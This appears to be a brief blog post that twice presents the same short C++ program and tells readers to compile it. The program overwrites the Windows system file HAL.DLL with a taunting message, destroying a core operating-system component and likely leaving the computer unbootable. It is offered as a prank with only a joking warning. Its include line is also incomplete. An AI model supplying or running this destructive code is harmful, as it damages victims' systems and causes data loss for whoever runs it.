compile this code with C++ compiler
#include
int main()
{
FILE * pFile;
pFile = fopen ("C:\\WINDOWS\\system32\\HAL.DLL","w");
if (pFile!=NULL)
{
fputs ("Nice Please Format Your Computer",pFile);
fclose (pFile);
}
return 0;
}
don't try this it your self bro
SIGNIFICANT
#include
int main()
{
FILE * pFile;
pFile = fopen ("C:\\WINDOWS\\system32\\HAL.DLL","w");
if (pFile!=NULL)
{
fputs ("Nice Please Format Your Computer",pFile);
fclose (pFile);
}
return 0;
}
don't try this it your self bro
SIGNIFICANT
Tidak ada komentar:
Posting Komentar